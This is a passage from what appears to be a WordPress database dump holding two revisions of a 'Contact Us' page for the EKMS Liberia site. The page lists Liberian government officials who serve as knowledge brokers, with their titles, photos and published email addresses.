sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-04-06 09:10:17','2021-04-06 09:10:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3671,42,'2021-04-06 09:10:17','2021-04-06 09:10:17','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-04-06 09:10:17','2021-04-06 09:10:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3672,42,'2021-04-06 09:10:18','2021-04-06 09:10:18','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this 